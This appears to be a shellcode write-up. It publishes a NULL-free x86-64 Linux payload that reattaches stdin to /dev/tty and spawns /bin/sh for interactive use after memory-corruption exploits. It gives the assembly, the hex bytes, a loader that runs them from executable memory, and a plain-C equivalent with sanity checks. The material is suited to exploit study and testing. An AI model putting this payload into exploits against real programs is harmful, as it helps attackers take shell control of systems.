Running shellcode while reclaiming the input

I have seen that security researchers, learners and coders who want to test a specific shellcode against some kind of memory corruption (an overflow, for example) occasionally have difficulties running OS shell commands after successfully spawning a shell. The reason is that the program appears to stop immediately after execve starts the system shell: there is no valid input left for the process, and standard input is no longer attached to the user's keyboard. This happens whenever standard input has been redirected to receive data from something else, typically a pipe (`python exploit.py | ./vuln`): once the exploit script exits, the shell reads end-of-file from the pipe and terminates at once. The usual workaround is to keep the writing side of the pipe open (`(python exploit.py; cat) | ./vuln`); the shellcode below solves the problem from inside the target instead. If you want to be able to type commands after the shellcode has spawned a shell, the solution is to reclaim (reopen) the input, taking it back to its normal state. I have written a shellcode which does exactly this: it opens /dev/tty, the controlling terminal of the process, duplicates that descriptor onto file descriptor 0, and only then calls execve on /bin/sh. I have modified the machine code of the final byte stream to be NULL-free so that it can be used in different test cases for memory attack evaluations. Use the code below to run the shellcode, or simply copy and paste the sc string into your own environment. Keep in mind this has been written for the Intel x86_64 architecture and Linux (tested on the latest version of Debian amd64). One caveat: it only works when the process has a controlling terminal. In a process without one (a service started by a daemon, or anything run under setsid), open("/dev/tty") fails with ENXIO; since the shellcode has already closed fd 0 by the time its dup2 fails, the shell it execs starts with no standard input at all.
Further, I have written the code in AT&T assembly syntax. If you prefer Intel syntax, just use ndisasm (`ndisasm -b 64 sc.bin`) or gdb (`set disassembly-flavor intel`) to view the Intel form of the code.



/*

This code reclaims the standard input before spawning a shell.
It resolves input issues with pipes and redirection.
Author:    Sirus Shahini

The sc string contains the hex equivalent of the assembly code below
(AT&T syntax; x86-64 Linux syscall numbers: open=2, close=3, dup2=33, execve=59).
Every immediate is loaded via push/pop or a full 8-byte movabs so that no 0x00
byte appears in the encoding.
------------------------------------------------------------------------------------
.text
    .global _start
_start:
    # open("/dev/tty", O_RDONLY)
    xor %rcx,%rcx
    mov $0x7974742f7665642f,%rax   # "/dev/tty" as a little-endian qword
    push %rcx                       # NUL terminator for the path
    push %rax
    mov %rsp,%rdi                   # rdi = pointer to "/dev/tty"
    mov %ecx,%esi                   # esi = 0 = O_RDONLY
    push $0x02
    pop  %rax                       # rax = SYS_open
    syscall
    mov %eax,%ebx                   # save the new fd in rbx (not clobbered by syscall)
    # close(0): redundant, dup2 closes the target itself, and harmful if fd 0 was
    # already closed, because open() would then have returned 0
    xor %rcx,%rcx
    mov %ecx,%edi                   # edi = 0
    push $0x03
    pop %rax                        # rax = SYS_close
    syscall
    # dup2(fd, 0)
    xor %rcx,%rcx
    mov %ebx,%edi                   # edi = fd from open()
    mov %ecx,%esi                   # esi = 0 = STDIN_FILENO
    push     $0x21
    pop      %rax                   # rax = SYS_dup2 (33)
    syscall
    # execve("/bin//sh", NULL, NULL)
    xor %rcx,%rcx
    mov $0x68732f2f6e69622f,%rax   # "/bin//sh" (double slash pads the path to 8 bytes)
    push %rcx                       # NUL terminator
    push %rax
    mov %rsp,%rdi                   # rdi = pointer to "/bin//sh"
    xor %eax,%eax
    mov %eax,%esi                   # argv = NULL
    mov %eax,%edx                   # envp = NULL
    push $59
    pop %rax                        # rax = SYS_execve
    syscall
------------------------------------------------------------------------------------

*/

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
/* 78 bytes and NULL-free, so strlen() returns the full length. */
static const char sc[] =
    "\x48\x31\xC9\x48\xB8\x2F\x64\x65\x76\x2F\x74\x74\x79\x51\x50\x48"
    "\x89\xE7\x89\xCE\x6A\x02\x58\x0F\x05\x89\xC3\x48\x31\xC9\x89\xCF"
    "\x6A\x03\x58\x0F\x05\x48\x31\xC9\x89\xDF\x89\xCE\x6A\x21\x58\x0F"
    "\x05\x48\x31\xC9\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x51\x50"
    "\x48\x89\xE7\x31\xC0\x89\xC6\x89\xC2\x6A\x3B\x58\x0F\x05";
int main(void){
    size_t len = strlen(sc);
    /* .rodata is not executable under NX: copy the bytes into an RWX mapping first. */
    void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(buf, sc, len);
    printf("By Cyrus Sh\n");
    fflush(stdout);                 /* execve never returns; flush stdio first */
    ((void (*)(void))buf)();
    return 1;                       /* reached only if the shellcode failed to exec */
}
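The same open/dup2/execve sequence written out in plain C, alongside a reproduction of the pipe EOF problem and two sanity checks on the published byte string (that it is NULL-free and that it contains exactly the four `syscall` instructions the listing shows). This is an added example, not the author's code; the byte string is the one printed above, while `reclaim_fd`, `is_null_free`, `count_syscalls` and `read_after_writer_closed` are names chosen here. Unlike the shellcode, `reclaim_fd` leaves the target descriptor untouched when `/dev/tty` cannot be opened.

```c
#define _GNU_SOURCE            /* POSIX prototypes (dup2, execve) under strict -std= */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* The page's shellcode bytes, copied verbatim, so the checks below run on the
 * real payload rather than on a stand-in. */
static const unsigned char sc[] =
    "\x48\x31\xC9\x48\xB8\x2F\x64\x65\x76\x2F\x74\x74\x79\x51\x50\x48"
    "\x89\xE7\x89\xCE\x6A\x02\x58\x0F\x05\x89\xC3\x48\x31\xC9\x89\xCF"
    "\x6A\x03\x58\x0F\x05\x48\x31\xC9\x89\xDF\x89\xCE\x6A\x21\x58\x0F"
    "\x05\x48\x31\xC9\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x51\x50"
    "\x48\x89\xE7\x31\xC0\x89\xC6\x89\xC2\x6A\x3B\x58\x0F\x05";
#define SC_LEN (sizeof(sc) - 1)   /* 78; the literal adds one trailing NUL */

/* 1 if the blob contains no 0x00 byte. strcpy()/gets()-style copies stop at
 * the first NUL, which is why every immediate in the listing goes through
 * push/pop or a full 8-byte movabs. */
int is_null_free(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00) return 0;
    return 1;
}

/* Count `syscall` instructions (opcode 0f 05). The listing has four: open,
 * close, dup2, execve. 0f 05 could in principle also sit inside an immediate;
 * the only wide immediates here are the two path strings, which contain
 * neither byte. */
int count_syscalls(const unsigned char *p, size_t n) {
    int c = 0;
    for (size_t i = 0; i + 1 < n; i++)
        if (p[i] == 0x0f && p[i + 1] == 0x05) c++;
    return c;
}

/* The failure the page describes, reproduced in-process: once the writing side
 * of a pipe is gone, read() on the reading side returns 0 (EOF) instead of
 * blocking, so a shell whose stdin is that pipe exits at once. Returns that
 * read() result. */
ssize_t read_after_writer_closed(void) {
    int p[2];
    char c;
    if (pipe(p) < 0) return -1;
    close(p[1]);                       /* the exploit script has exited */
    ssize_t n = read(p[0], &c, 1);     /* 0 == EOF, not a block */
    close(p[0]);
    return n;
}

/* What the shellcode does, in C: open `path` read-only and duplicate it onto
 * `target`. Parameterised so it can be exercised on any file and descriptor,
 * not only /dev/tty onto fd 0. Returns 0, or -errno if open or dup2 fails; on
 * failure `target` is left as it was (the shellcode, by contrast, has already
 * closed fd 0 before its dup2 can fail). */
int reclaim_fd(const char *path, int target) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -errno;         /* -ENXIO when there is no controlling tty */
    if (fd != target) {                /* open() may itself return `target` if it was free */
        if (dup2(fd, target) < 0) { int e = errno; close(fd); return -e; }
        close(fd);                     /* dup2 made its own reference */
    }
    return 0;
}

int main(void) {
    printf("shellcode: %zu bytes, null-free=%d, syscalls=%d\n",
           SC_LEN, is_null_free(sc, SC_LEN), count_syscalls(sc, SC_LEN));
    printf("read() on a pipe whose writer is gone returns %zd\n",
           read_after_writer_closed());
    int rc = reclaim_fd("/dev/tty", STDIN_FILENO);
    if (rc < 0)
        fprintf(stderr, "could not reattach stdin to /dev/tty: %s\n", strerror(-rc));
    fflush(stdout);                    /* execve discards unflushed stdio buffers */
    char *argv[] = { "/bin//sh", NULL };   /* the shellcode passes argv = envp = NULL */
    execve("/bin//sh", argv, NULL);
    perror("execve");
    return 1;
}
```

Build with `gcc -Wall -o reclaim reclaim.c` and run it from an interactive terminal as `echo anything | ./reclaim`: stdin starts out as a pipe that is already at EOF, yet the shell that replaces the process reads from your keyboard. Run it with no controlling terminal instead (`setsid ./reclaim < /dev/null`) and `reclaim_fd` reports ENXIO and leaves stdin alone, whereas the shellcode in the same situation execs a shell whose fd 0 has already been closed.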
